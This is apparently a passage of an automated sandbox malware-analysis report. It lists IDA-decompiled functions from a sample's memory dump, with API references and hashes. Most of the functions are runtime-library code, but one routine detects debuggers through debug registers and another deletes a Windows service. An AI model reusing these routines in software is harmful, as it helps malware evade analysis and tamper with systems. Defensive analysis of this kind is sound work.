				void* _t141;
				signed int _t142;
				signed int _t144;
				void* _t146;
				void* _t147;
				signed int _t156;
				signed short _t158;
				void* _t159;
				void* _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t167;
				intOrPtr* _t168;
				signed short* _t170;
				intOrPtr* _t171;
				intOrPtr* _t172;
				signed int _t173;
				signed int _t187;
				signed short* _t189;
				signed short* _t195;
				void* _t200;
				signed int _t201;
				signed int _t202;
				signed short _t203;
				signed int _t204;
				signed short* _t205;
				signed int _t206;
				signed short* _t207;
				signed int _t209;
				void* _t210;
				signed short _t211;
				signed short _t212;
				signed short* _t213;
				intOrPtr* _t214;
				signed int _t215;
				signed int _t217;
				signed int _t223;
				signed int _t227;
				signed int _t231;
				void* _t232;
				void* _t233;
				void* _t235;
				signed int _t236;
				void* _t237;
				signed int _t238;
				void* _t244;
				void* _t245;

				_t213 = __edi;
				_v28 = E01356A62();
				_v12 = E01356A68();
				_t167 = 0;
				_v32 = 0;
				_v8 = 0;
				_v16 = 0;
				if(E01356AC6( &_v8) != 0 || E01356A6E( &_v16) != 0) {
					L47:
					_push(_t167);
					_push(_t167);
					_push(_t167);
					_push(_t167);
					_push(_t167);
					E013496E7();
					asm("int3");
					_t235 = _t237;
					_t238 = _t237 - 0xc;
					_push(_t167);
					_push(_t217);
					_push(_t213);
					_t214 = E01356A62();
					_t168 = E01356A68();
					_v76 = 0;
					_v80 = 0;
					_v84 = 0;
					_t82 = E01356AC6( &_v76);
					__eflags = _t82;
					if(_t82 != 0) {
						L60:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E013496E7();
						asm("int3");
						_push(_t235);
						_t236 = _t238;
						_t84 =  *0x13a4018; // 0x39cca9f6
						_v124 = _t84 ^ _t236;
						 *0x13a446c =  *0x13a446c | 0xffffffff;
						 *0x13a4460 =  *0x13a4460 | 0xffffffff;
						_push(_t168);
						_push(0);
						_push(_t214);
						 *0x13ab4c8 = 0;
						_t88 = E01360687(__eflags,  &_v640,  &_v636, 0x100, 0x137ce0c);
						__eflags = _t88;
						if(_t88 != 0) {
							__eflags = _t88 - 0x22;
							if(_t88 == 0x22) {
								_t215 = E013576ED(_v532 + _v532);
								__eflags = _t215;
								if(__eflags != 0) {
									_t93 = E01360687(__eflags,  &_v536, _t215, _v532, 0x137ce0c);
									__eflags = _t93;
									if(_t93 == 0) {
										E01355C8F(0);
									} else {
										_push(_t215);
										goto L68;
									}
								} else {
									_push(0);
									L68:
									E01355C8F();
									_t215 = 0;
								}
							} else {
								_t215 = 0;
							}
						} else {
							_t215 =  &_v528;
						}
						asm("sbb esi, esi");
						_t223 =  ~(_t215 -  &_v528) & _t215;
						__eflags = _t215;
						if(_t215 == 0) {
							L76:
							L48();
						} else {
							__eflags =  *_t215;
							if(__eflags == 0) {
								goto L76;
							} else {
								_push(_t215);
								E0135711A(0, _t215, __eflags);
							}
						}
						E01355C8F(_t223);
						__eflags = _v16 ^ _t236;
						return E0132EA79(_v16 ^ _t236, _t223);
					} else {
						_t101 = E01356A6E( &_v16);
						__eflags = _t101;
						if(_t101 != 0) {
							goto L60;
						} else {
							_t103 = E01356A9A( &_v20);
							__eflags = _t103;
							if(_t103 != 0) {
								goto L60;
							} else {
								E01355C8F( *0x13ab4c0);
								 *0x13ab4c0 = 0;
								 *_t238 = 0x13ab4d0;
								_t105 = GetTimeZoneInformation(??);
								__eflags = _t105 - 0xffffffff;
								if(_t105 != 0xffffffff) {
									_t206 =  *0x13ab4d0 * 0x3c;
									_t187 = 1;
									__eflags =  *0x13ab516; // 0x0
									_t227 =  *0x13ab524; // 0x0
									 *0x13ab4c8 = 1;
									_v12 = _t206;
									if(__eflags != 0) {
										_t120 = _t227 * 0x3c + _t206;
										__eflags = _t120;
										_v12 = _t120;
									}
									__eflags =  *0x13ab56a;
									if( *0x13ab56a == 0) {
										L57:
										_t109 = 0;
										_t187 = 0;
										__eflags = 0;
									} else {
										_t117 =  *0x13ab578; // 0x0
										__eflags = _t117;
										if(_t117 == 0) {
											goto L57;
										} else {
											_t109 = (_t117 - _t227) * 0x3c;
										}
									}
									_v16 = _t187;
									_v20 = _t109;
									E013478D0(_t214,  *_t168, 0, 0x80);
									__eflags = 0;
									E013478D0(_t214,  *((intOrPtr*)(_t168 + 4)), 0, 0x80);
									E013478D0(_t214,  *_t214, 0, 0x40);
									E013478D0(_t214,  *((intOrPtr*)(_t214 + 4)), 0, 0x40);
									E013575FA(_t168, _t214, 0x13ab4d4,  *_t168,  *_t214, E0134B60D(_t206));
									E013575FA(_t168, _t214, 0x13ab528,  *((intOrPtr*)(_t168 + 4)),  *((intOrPtr*)(_t214 + 4)), _t114);
								}
								 *(E01356A5C()) = _v12;
								 *(E01356A50()) = _v16;
								_t108 = E01356A56();
								 *_t108 = _v20;
								return _t108;
							}
						}
					}
				} else {
					_t123 =  *0x13ab4c0; // 0x0
					_t213 = _a4;
					if(_t123 == 0) {
						L11:
						_t189 = _t213;
						_t11 =  &(_t189[1]); // 0x13575de
						_t207 = _t11;
						do {
							_t124 =  *_t189;
							_t189 =  &(_t189[1]);
						} while (_t124 != _t167);
						_t231 = E013576ED(2 + (_t189 - _t207 >> 1) * 2);
						if(_t231 == 0) {
							L44:
							return E01355C8F(_t231);
						}
						E01355C8F( *0x13ab4c0);
						_t195 = _t213;
						_t208 = _t231;
						_t217 = _t167;
						 *0x13ab4c0 = _t231;
						_v24 = _t217;
						_t15 =  &(_t195[1]); // 0x13575de
						_t170 = _t15;
						do {
							_t129 =  *_t195;
							_t195 =  &(_t195[1]);
						} while (_t129 != _v32);
						_t17 = (_t195 - _t170 >> 1) + 1; // 0x13575db
						_t131 = E01352808(_t208, _t17, _t213);
						_t237 = _t237 + 0xc;
						if(_t131 == 0) {
							_t171 = _v12;
							E013478D0(_t213,  *_t171, _t131, 0x80);
							_t19 = _t171 + 4; // 0xfffffdd7
							E013478D0(_t213,  *_t19, 0, 0x80);
							_t172 = _v28;
							E013478D0(_t213,  *_t172, 0, 0x40);
							E013478D0(_t213,  *((intOrPtr*)(_t172 + 4)), 0, 0x40);
							_push(3);
							_push( *_t172);
							_push( *_v12);
							E013570D3(_t172, _t213, _t213);
							_t244 = _t237 + 0x40;
							_t141 = 3;
							do {
								if( *_t213 != 0) {
									_t213 =  &(_t213[1]);
								}
								_t141 = _t141 - 1;
							} while (_t141 != 0);
							_t142 =  *_t213 & 0x0000ffff;
							_v36 = _t142;
							_t200 = 0x2d;
							if(_t142 == _t200) {
								_t213 =  &(_t213[1]);
							}
							_t144 = E0134B3BC(_t200, _t213,  &_v20, 0xa);
							_t245 = _t244 + 0xc;
							_t173 = _t144 * 0xe10;
							_v8 = _t173;
							while(1) {
								_t201 =  *_t213 & 0x0000ffff;
								if(_t201 != 0x2b && _t201 - 0x30 > 9) {
									break;
								}
								_t213 =  &(_t213[1]);
							}
							_t146 = 0x3a;
							__eflags = _t201 - _t146;
							if(_t201 != _t146) {
								L39:
								_t147 = 0x2d;
								__eflags = _v36 - _t147;
								if(_v36 == _t147) {
									_t173 =  ~_t173;
									_v8 = _t173;
								}
								_t202 =  *_t213 & 0x0000ffff;
								__eflags = _t202;
								_v16 = 0 | _t202 != 0x00000000;
								__eflags = _t202;
								if(_t202 != 0) {
									_push(3);
									_push( *((intOrPtr*)(_v28 + 4)));
									_push( *((intOrPtr*)(_v12 + 4)));
									E013570D3(_t173, _t213, _t213);
									_t173 = _v8;
								}
								 *(E01356A5C()) = _t173;
								 *(E01356A50()) = _v16;
								goto L44;
							}
							_t213 =  &(_t213[1]);
							_t156 = E0134B3BC(_t201, _t213,  &_v20, 0xa);
							_t245 = _t245 + 0xc;
							_t203 = 0x30;
							_t173 = _v8 + _t156 * 0x3c;
							_v32 = _t203;
							_t158 =  *_t213 & 0x0000ffff;
							_v8 = _t173;
							_t209 = _t158;
							__eflags = _t158 - _t203;
							if(_t158 < _t203) {
								L33:
								_t159 = 0x3a;
								__eflags = _t209 - _t159;
								if(_t209 != _t159) {
									goto L39;
								}
								_t213 =  &(_t213[1]);
								_t161 = E0134B3BC(_t203, _t213,  &_v20, 0xa);
								_t245 = _t245 + 0xc;
								_t173 = _v8 + _t161;
								_t162 =  *_t213 & 0x0000ffff;
								_v8 = _t173;
								_t210 = 0x30;
								__eflags = _t162 - _t210;
								if(_t162 < _t210) {
									goto L39;
								}
								_t204 = _t162;
								_t232 = 0x39;
								while(1) {
									__eflags = _t204 - _t232;
									if(_t204 > _t232) {
										break;
									}
									_t213 =  &(_t213[1]);
									_t163 =  *_t213 & 0x0000ffff;
									_t204 = _t163;
									__eflags = _t163 - _t210;
									if(_t163 >= _t210) {
										continue;
									}
									break;
								}
								_t231 = _v24;
								goto L39;
							}
							_t203 = _t158;
							_t233 = 0x39;
							while(1) {
								_t209 = _t203 & 0x0000ffff;
								__eflags = _t203 - _t233;
								if(_t203 > _t233) {
									break;
								}
								_t213 =  &(_t213[1]);
								_t164 =  *_t213 & 0x0000ffff;
								_t203 = _t164;
								_t209 = _t164;
								__eflags = _t164 - _v32;
								if(_t164 >= _v32) {
									continue;
								}
								break;
							}
							_t231 = _v24;
							goto L33;
						}
						_t167 = 0;
						__eflags = 0;
						goto L47;
					} else {
						_t205 = _t213;
						while(1) {
							_t211 =  *_t205;
							if(_t211 !=  *_t123) {
								break;
							}
							if(_t211 == 0) {
								L8:
								_t165 = _t167;
							} else {
								_t9 =  &(_t205[1]); // 0xfdd7e805
								_t212 =  *_t9;
								if(_t212 !=  *((intOrPtr*)(_t123 + 2))) {
									break;
								} else {
									_t205 =  &(_t205[2]);
									_t123 = _t123 + 4;
									if(_t212 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t165 == 0) {
								return _t165;
							} else {
								goto L11;
							}
							goto L78;
						}
						asm("sbb eax, eax");
						_t165 = _t123 | 0x00000001;
						__eflags = _t165;
						goto L10;
					}
				}
				L78:
			}

0x0135711a
0x0135712a
0x01357132
0x01357135
0x0135713a
0x0135713e
0x01357141
0x0135714c
0x013573b0
0x013573b0
0x013573b1
0x013573b2
0x013573b3
0x013573b4
0x013573b5
0x013573ba
0x013573be
0x013573c0
0x013573c3
0x013573c4
0x013573c5
0x013573cb
0x013573d2
0x013573d9
0x013573dd
0x013573e0
0x013573e3
0x013573e9
0x013573eb
0x0135750a
0x0135750a
0x0135750b
0x0135750c
0x0135750d
0x0135750e
0x0135750f
0x01357514
0x01357517
0x01357518
0x01357520
0x01357527
0x0135752a
0x01357537
0x0135753e
0x0135753f
0x01357540
0x01357555
0x0135755c
0x01357564
0x01357566
0x01357570
0x01357573
0x01357587
0x0135758a
0x0135758c
0x013575a7
0x013575af
0x013575b1
0x013575b7
0x013575b3
0x013575b3
0x00000000
0x013575b3
0x0135758e
0x0135758e
0x0135758f
0x0135758f
0x01357594
0x01357594
0x01357575
0x01357575
0x01357575
0x01357568
0x01357568
0x01357568
0x013575c9
0x013575cb
0x013575cd
0x013575cf
0x013575df
0x013575df
0x013575d1
0x013575d1
0x013575d4
0x00000000
0x013575d6
0x013575d6
0x013575d7
0x013575dc
0x013575d4
0x013575e5
0x013575f0
0x013575f9
0x013573f1
0x013573f5
0x013573fb
0x013573fd
0x00000000
0x01357403
0x01357407
0x0135740d
0x0135740f
0x00000000
0x01357415
0x0135741b
0x01357420
0x01357426
0x0135742d
0x01357433
0x01357436
0x0135743c
0x01357445
0x01357446
0x0135744d
0x01357453
0x01357459
0x0135745c
0x01357461
0x01357461
0x01357463
0x01357463
0x01357466
0x0135746e
0x01357480
0x01357480
0x01357482
0x01357482
0x01357470
0x01357470
0x01357475
0x01357477
0x00000000
0x01357479
0x0135747b
0x0135747b
0x01357477
0x01357489
0x0135748d
0x01357494
0x0135749a
0x013574a0
0x013574aa
0x013574b5
0x013574cb
0x013574df
0x013574e4
0x013574ef
0x013574f9
0x013574fe
0x01357504
0x01357509
0x01357509
0x0135740f
0x013573fd
0x01357164
0x01357164
0x01357169
0x0135716e
0x013571a5
0x013571a5
0x013571a7
0x013571a7
0x013571aa
0x013571aa
0x013571ad
0x013571b0
0x013571c6
0x013571cb
0x013573a2
0x00000000
0x013573a8
0x013571d7
0x013571dd
0x013571df
0x013571e1
0x013571e3
0x013571e9
0x013571ec
0x013571ec
0x013571ef
0x013571ef
0x013571f2
0x013571f5
0x01357200
0x01357205
0x0135720a
0x0135720f
0x01357215
0x01357220
0x0135722d
0x01357230
0x01357235
0x0135723f
0x0135724c
0x01357254
0x01357256
0x01357258
0x0135725b
0x01357260
0x01357267
0x01357268
0x0135726b
0x0135726d
0x0135726d
0x01357270
0x01357270
0x01357275
0x0135727c
0x0135727f
0x01357283
0x01357285
0x01357285
0x0135728f
0x01357294
0x01357297
0x0135729d
0x013572a0
0x013572a0
0x013572a6
0x00000000
0x00000000
0x013572b1
0x013572b1
0x013572b8
0x013572b9
0x013572bc
0x01357356
0x01357358
0x01357359
0x0135735d
0x0135735f
0x01357361
0x01357361
0x01357364
0x01357369
0x0135736f
0x01357372
0x01357375
0x0135737a
0x0135737c
0x01357382
0x01357386
0x0135738b
0x0135738e
0x01357396
0x013573a0
0x00000000
0x013573a0
0x013572c7
0x013572cc
0x013572d4
0x013572dc
0x013572dd
0x013572df
0x013572e2
0x013572e5
0x013572e8
0x013572ea
0x013572ed
0x0135730f
0x01357311
0x01357312
0x01357315
0x00000000
0x00000000
0x0135731c
0x01357321
0x01357329
0x0135732c
0x0135732e
0x01357331
0x01357336
0x01357337
0x0135733a
0x00000000
0x00000000
0x0135733e
0x01357340
0x01357341
0x01357341
0x01357344
0x00000000
0x00000000
0x01357346
0x01357349
0x0135734c
0x0135734e
0x01357351
0x00000000
0x00000000
0x00000000
0x01357351
0x01357353
0x00000000
0x01357353
0x013572f1
0x013572f3
0x013572f4
0x013572f4
0x013572f7
0x013572fa
0x00000000
0x00000000
0x013572fc
0x013572ff
0x01357302
0x01357304
0x01357306
0x0135730a
0x00000000
0x00000000
0x00000000
0x0135730a
0x0135730c
0x00000000
0x0135730c
0x013573ae
0x013573ae
0x00000000
0x01357170
0x01357170
0x01357172
0x01357172
0x01357178
0x00000000
0x00000000
0x0135717d
0x01357194
0x01357194
0x0135717f
0x0135717f
0x0135717f
0x01357187
0x00000000
0x01357189
0x01357189
0x0135718c
0x01357192
0x00000000
0x00000000
0x00000000
0x00000000
0x01357192
0x01357187
0x0135719d
0x0135719f
0x013573ad
0x00000000
0x00000000
0x00000000
0x00000000
0x0135719f
0x01357198
0x0135719a
0x0135719a
0x00000000
0x0135719a
0x0135716e
0x00000000

APIs

_free.LIBCMT ref: 013571D7
_free.LIBCMT ref: 013573A3
_free.LIBCMT ref: 0135741B
GetTimeZoneInformation.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,013575DC,?,?,00000000), ref: 0135742D

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 7cc1dd148a2f1a7090d41fe1e52a40b003909d2cdb57bd5dd648ba244d23056c
Instruction ID: 51e1fdcef56e80ceeac92a9e386514531a34632659248990e3edd98ae7be4062
Opcode Fuzzy Hash: 7cc1dd148a2f1a7090d41fe1e52a40b003909d2cdb57bd5dd648ba244d23056c
Instruction Fuzzy Hash: E1A12BB2900216ABEB60AF6DDC45E6EBFBDEF50B1CF944169ED05A7244E7309A40C790

Uniqueness

Uniqueness Score: -1.00%

Function 0135EBE5, Relevance: 7.7, APIs: 5, Instructions: 183
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E0135EBE5(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, signed short _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t65;
				int _t67;
				short* _t71;
				intOrPtr _t74;
				void* _t76;
				short* _t77;
				intOrPtr _t84;
				short* _t88;
				short* _t91;
				short** _t102;
				short* _t103;
				signed short _t104;
				signed int _t107;
				void* _t108;

				_t39 =  *0x13a4018; // 0x39cca9f6
				_v8 = _t39 ^ _t107;
				_t88 = _a12;
				_t104 = _a4;
				_v28 = _a8;
				_v24 = E013559E0(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E013559E0(__ecx, __edx);
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t91 = _t104 + 0x80;
				_t46 = _v24;
				 *_t46 = _t104;
				_t102 =  &(_t46[2]);
				 *_t102 = _t91;
				if(_t91 != 0 &&  *_t91 != 0) {
					_t84 =  *0x137d664; // 0x17
					E0135EB84(_t91, 0, 0x137d550, _t84 - 1, _t102);
					_t46 = _v24;
					_t108 = _t108 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if(__eflags == 0) {
						goto L19;
					}
					E0135E526(_t91, _t99, __eflags,  &_v20);
					_pop(_t91);
					goto L20;
				} else {
					_t71 =  *_t102;
					if(_t71 == 0) {
						L8:
						E0135E60C(_t91, _t99, __eflags,  &_v20);
						L9:
						_pop(_t91);
						if(_v20 != 0) {
							_t103 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t104 = E0135EA10(_t91,  ~_t104 & _t104 + 0x00000100,  &_v20);
							__eflags = _t104;
							if(_t104 == 0) {
								L22:
								L23:
								return E0132EA79(_v8 ^ _t107, _t104);
							}
							_t55 = IsValidCodePage(_t104 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t104;
							}
							E013563D2(_v16,  &(_v24[0x128]), 0x55, _t103);
							__eflags = _t88;
							if(_t88 == 0) {
								L34:
								goto L23;
							}
							_t33 =  &(_t88[0x90]); // 0xd0
							E013563D2(_v16, _t33, 0x55, _t103);
							_t65 = GetLocaleInfoW(_v16, 0x1001, _t88, 0x40);
							__eflags = _t65;
							if(_t65 == 0) {
								goto L22;
							}
							_t36 =  &(_t88[0x40]); // 0x30
							_t67 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t67;
							if(_t67 == 0) {
								goto L22;
							}
							_t38 =  &(_t88[0x80]); // 0xb0
							E01363434(_t38, _t104, _t38, 0x10, 0xa);
							goto L34;
						}
						_t74 =  *0x137d54c; // 0x41
						_t76 = E0135EB84(_t91, _t99, 0x137d240, _t74 - 1, _v24);
						_t108 = _t108 + 0xc;
						if(_t76 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t77 =  *_t102;
						_t103 = 0;
						if(_t77 == 0) {
							L14:
							E0135E60C(_t91, _t99, __eflags,  &_v20);
							L15:
							_pop(_t91);
							goto L21;
						}
						_t121 =  *_t77;
						if( *_t77 == 0) {
							goto L14;
						}
						E0135E571(_t91, _t99, _t121,  &_v20);
						goto L15;
					}
					_t117 =  *_t71 - _t99;
					if( *_t71 == _t99) {
						goto L8;
					}
					E0135E571(_t91, _t99, _t117,  &_v20);
					goto L9;
				}
			}

0x0135ebed
0x0135ebf4
0x0135ebfb
0x0135ebff
0x0135ec03
0x0135ec11
0x0135ec16
0x0135ec17
0x0135ec18
0x0135ec19
0x0135ec21
0x0135ec23
0x0135ec29
0x0135ec2f
0x0135ec32
0x0135ec34
0x0135ec37
0x0135ec3b
0x0135ec42
0x0135ec4f
0x0135ec54
0x0135ec57
0x0135ec5a
0x0135ec5a
0x0135ec5c
0x0135ec5f
0x0135ec63
0x0135ecd3
0x0135ecd5
0x0135ecd7
0x0135ecea
0x0135ecea
0x0135ecf1
0x0135ecf7
0x0135ecfa
0x00000000
0x0135ecfa
0x0135ecd9
0x0135ecdc
0x00000000
0x00000000
0x0135ece2
0x0135ece7
0x00000000
0x0135ec6a
0x0135ec6a
0x0135ec6e
0x0135ec80
0x0135ec84
0x0135ec89
0x0135ec8d
0x0135ec8e
0x0135ed16
0x0135ed16
0x0135ed18
0x0135ed24
0x0135ed2e
0x0135ed32
0x0135ed34
0x0135ed05
0x0135ed07
0x0135ed15
0x0135ed15
0x0135ed3a
0x0135ed40
0x0135ed42
0x00000000
0x00000000
0x0135ed49
0x0135ed4f
0x0135ed51
0x00000000
0x00000000
0x0135ed53
0x0135ed56
0x0135ed58
0x0135ed5a
0x0135ed5a
0x0135ed6b
0x0135ed70
0x0135ed72
0x0135edd2
0x00000000
0x0135edd4
0x0135ed77
0x0135ed81
0x0135ed91
0x0135ed97
0x0135ed99
0x00000000
0x00000000
0x0135eda1
0x0135edb0
0x0135edb6
0x0135edb8
0x00000000
0x00000000
0x0135edc2
0x0135edca
0x00000000
0x0135edcf
0x0135ec94
0x0135eca3
0x0135eca8
0x0135ecad
0x0135ecfd
0x0135ecfd
0x0135ecfd
0x0135ecff
0x0135ed03
0x00000000
0x00000000
0x00000000
0x0135ed03
0x0135ecaf
0x0135ecb1
0x0135ecb5
0x0135ecc7
0x0135eccb
0x0135ecd0
0x0135ecd0
0x00000000
0x0135ecd0
0x0135ecb7
0x0135ecba
0x00000000
0x00000000
0x0135ecc0
0x00000000
0x0135ecc0
0x0135ec70
0x0135ec73
0x00000000
0x00000000
0x0135ec79
0x00000000
0x0135ec79

APIs

Part of subcall function 013559E0: GetLastError.KERNEL32(?,?,?,01349740,013A18F0,0000000C), ref: 013559E5
Part of subcall function 013559E0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01349740,013A18F0,0000000C), ref: 01355A83

Part of subcall function 013559E0: _free.LIBCMT ref: 01355A42
Part of subcall function 013559E0: _free.LIBCMT ref: 01355A78

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0135ECF1
IsValidCodePage.KERNEL32(00000000), ref: 0135ED3A
IsValidLocale.KERNEL32(?,00000001), ref: 0135ED49
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0135ED91
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0135EDB0

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: e732c0e9c9d7899aa27a64b63efa70ec805d94dcc453fd8493372b93f36225a7
Instruction ID: 4a890035d3f812f9bdd33366a011487c8c13e894b39a90d585fa28cbbb2ee688
Opcode Fuzzy Hash: e732c0e9c9d7899aa27a64b63efa70ec805d94dcc453fd8493372b93f36225a7
Instruction Fuzzy Hash: 94517E71A0021AAFEF60DFADDC44EAAB7B8EF14B49F054439EE15E7140E770DA008B61

Uniqueness

Uniqueness Score: -1.00%

Function 012FA100, Relevance: 7.6, APIs: 5, Instructions: 55
threadCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E012FA100(void* __edi, void* __esi) {
				signed int _v8;
				char _v12;
				struct _CONTEXT _v728;
				signed int _t14;
				void* _t20;
				void* _t33;
				signed int _t34;

				_t33 = __esi;
				_t14 =  *0x13a4018; // 0x39cca9f6
				_v8 = _t14 ^ _t34;
				if(IsDebuggerPresent() != 0) {
					L9:
					return E0132EA79(_v8 ^ _t34, _t33);
				} else {
					_v12 = 1;
					_t20 = GetCurrentProcess();
					__imp__CheckRemoteDebuggerPresent(_t20,  &_v12);
					if(_t20 == 0 || _v12 != 0) {
						goto L9;
					} else {
						E013478D0(__edi,  &(_v728.Dr0), 0, 0x2c8);
						_v728.ContextFlags = 0x10010;
						if(GetThreadContext(GetCurrentThread(),  &_v728) == 0 || _v728.Dr0 == 0 && _v728.Dr1 == 0 && _v728.Dr2 == 0 && _v728.Dr3 == 0) {
							return E0132EA79(_v8 ^ _t34, _t33);
						} else {
							goto L9;
						}
					}
				}
			}

0x012fa100
0x012fa109
0x012fa110
0x012fa11b
0x012fa1af
0x012fa1be
0x012fa121
0x012fa124
0x012fa12c
0x012fa133
0x012fa13b
0x00000000
0x012fa143
0x012fa151
0x012fa159
0x012fa179
0x012fa1ae
0x00000000
0x00000000
0x00000000
0x012fa179
0x012fa13b

APIs

IsDebuggerPresent.KERNEL32 ref: 012FA113
GetCurrentProcess.KERNEL32(?), ref: 012FA12C
CheckRemoteDebuggerPresent.KERNEL32(00000000), ref: 012FA133
GetCurrentThread.KERNEL32 ref: 012FA16A
GetThreadContext.KERNEL32(00000000), ref: 012FA171

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: CurrentDebuggerPresentThread$CheckContextProcessRemote
String ID:
API String ID: 3297751945-0
Opcode ID: 4289a7b539ae1cee74611e1c40be7fde6602be401df48904a7676ec5fa0cecc5
Instruction ID: 1f0c417b8262da4380a373fa99e090e9bec4f4de8f69dfe8e6f1b169b436b151
Opcode Fuzzy Hash: 4289a7b539ae1cee74611e1c40be7fde6602be401df48904a7676ec5fa0cecc5
Instruction Fuzzy Hash: 3B110D30A1121DDFEF30EFA4E84D79EB7B8BB14355F0140AAD60AA3141EB749A84DB61

Uniqueness

Uniqueness Score: -1.00%

Function 012FBE70, Relevance: 7.5, APIs: 5, Instructions: 45
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012FBE70(short* _a4) {
				signed int _t13;
				void* _t15;
				short* _t17;
				void* _t18;

				_t17 = _a4;
				_t13 = 0;
				if(_t17[8] == 0) {
					return 0;
				} else {
					_t15 = OpenSCManagerW(0, 0, 0xf003f);
					if(_t15 != 0) {
						if(_t17[0xa] >= 8) {
							_t17 =  *_t17;
						}
						_t18 = OpenServiceW(_t15, _t17, 0x10020);
						if(_t18 != 0) {
							_t13 = _t13 & 0xffffff00 | DeleteService(_t18) != 0x00000000;
							CloseServiceHandle(_t18);
						}
						CloseServiceHandle(_t15);
					}
					return _t13;
				}
			}

0x012fbe75
0x012fbe78
0x012fbe7e
0x012fbed9
0x012fbe80
0x012fbe90
0x012fbe94
0x012fbe9a
0x012fbe9c
0x012fbe9c
0x012fbeab
0x012fbeaf
0x012fbebb
0x012fbebe
0x012fbebe
0x012fbec5
0x012fbec5
0x012fbed1
0x012fbed1

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 012FBE8A
OpenServiceW.ADVAPI32(00000000,?,00010020), ref: 012FBEA5
DeleteService.ADVAPI32(00000000), ref: 012FBEB2
CloseServiceHandle.ADVAPI32(00000000), ref: 012FBEBE
CloseServiceHandle.ADVAPI32(00000000), ref: 012FBEC5

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
